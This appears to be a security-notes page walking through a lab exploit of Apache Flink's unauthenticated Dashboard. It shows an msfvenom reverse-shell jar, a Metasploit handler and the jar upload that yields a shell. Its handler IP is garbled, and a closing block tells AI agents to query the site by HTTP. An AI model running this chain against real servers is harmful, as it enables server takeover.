# Apache Flink Unauthorized Access Vulnerability

## Vulnerability Description

The Apache Flink Dashboard has no user authentication by default. An attacker can directly upload a trojan jar package through the unauthorized Flink Dashboard console and remotely execute any system command to obtain server privileges.

## Environment setup

Test version: flink-1.15.1

Modify `flink-1.15.1/conf/flink-conf.yaml`,open 8081 port.

![image-20230130110811353](/files/CBSBnTYjTDs163VORCUe)

Start Flink:

```
start-cluster.sh
```

## Vulnerability Exploitation

Access the web page.

![image-20230130110857282](/files/RilAHP7BAwsuxdjJSpiG)

Use msfvenom to generate rce.jar:

```
┌──(root💀kali)-[/tmp]
└─# msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.32.130 LPORT=4444 -f jar > rce.jar
Payload size: 5310 bytes
Final size of jar file: 5310 bytes
```

Configure msf listening:

```
bashCopy codemsf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 1291.68.32.130
lhost => 1291.68.32.130
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > run
```

Upload the `rec.jar` file at Submit New Job, click submit.

![image-20230130110921888](/files/LPVhSlsuInTYc8Y2cz4m)

Successful get shell.

![image-20230130110926718](/files/mVmJWc98xPvOM3znxppv)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://icybersec.gitbook.io/cybersecuritynote-en/security-vulnerability/unauthorized-vulnerability/apache-flink-unauthorized-access-vulnerability.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.